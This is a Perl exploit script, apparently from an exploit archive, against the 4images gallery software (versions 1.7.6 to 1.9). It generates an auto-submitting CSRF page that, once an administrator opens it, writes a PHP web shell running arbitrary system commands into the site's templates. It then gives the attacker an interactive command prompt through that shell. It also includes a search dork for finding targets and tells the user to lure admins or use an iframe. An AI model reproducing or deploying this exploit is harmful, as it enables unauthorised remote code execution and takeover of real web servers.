4Images 1.7.6 Cross Site Request Forgery

`#!/usr/bin/perl  
########################################################################  
# Title : 4images 1.7.6 > 9 Csrf inject php code  
# Author : Or4nG.M4n  
# Version : 1.7.6 > 9  
# Homepage : http://www.4homepages.de/  
# Dork : "Powered by 4images"  
# video : http://youtu.be/NYF_zC9hH54  
# Thnks~#+----------------------------------+  
# | xSs m4n i-Hmx h311c0d3 |.sp. abo.B4sil  
# | HcJ Cyb3r ahwak20o0 sa^Dev!L |.sp. r00ts3c  
# +----------------------------------+  
# 4images 1.7.6 > 9 Csrf inject php code  
# vuln : template.php  
use LWP::UserAgent;  
use LWP::Simple;  
system("cls");  
print  
"  
+----------------------------------------+\n  
| 4images 1.7.6 > 9 csrf inject php code |\n  
| Or4nG.M4n : priv8te\@hotmail.com |\n  
+----------------------------------------+\n  
Loading ...\n  
";  
sleep(3);  
print "http://tragt & path #";  
$h = <STDIN>;  
chomp $h;  
$html = '<form action="'.$h.'/admin/templates.php" name="csrf" method="post">  
<input type="hidden" name="action" value="savetemplate">  
<textarea name="content" cols="0" rows="0" >  
<?php  
$cmd = $_GET["cmd"];  
print "\n__Code__\n";  
@system($cmd);  
print "\n__Code__\n";  
?>  
</textarea>  
<input type="hidden" name="template_file_name" value="inject.php">  
<input type="hidden" name="template_folder" value="default">  
<script>document.csrf.submit();</script>  
</form>';  
sleep(2);  
print "Createing ...\n";  
open(XSS , '>>csrf.htm');  
print XSS $html;  
close(XSS);  
print "Createing Done .. \n";  
sleep(2);  
print "Now give csrf.htm to admin or useing iframe code\n";  
sleep(1);  
print "\n if you done hit any key to continue";  
$continue = <>;  
for($ops=0;$ops<15;$ops++)  
{  
print "  
Command# ";  
$execut =<STDIN>;  
chomp($execut);  
$ex = $h."/templates/default/inject.php?cmd=".$execut;  
my $content = get $ex;  
while($content =~ m{__Code__(.*?)__code__(.*)}g){  
print "\n [+]Executing\n\n";  
}  
print $content;  
}  
# The End  
  
`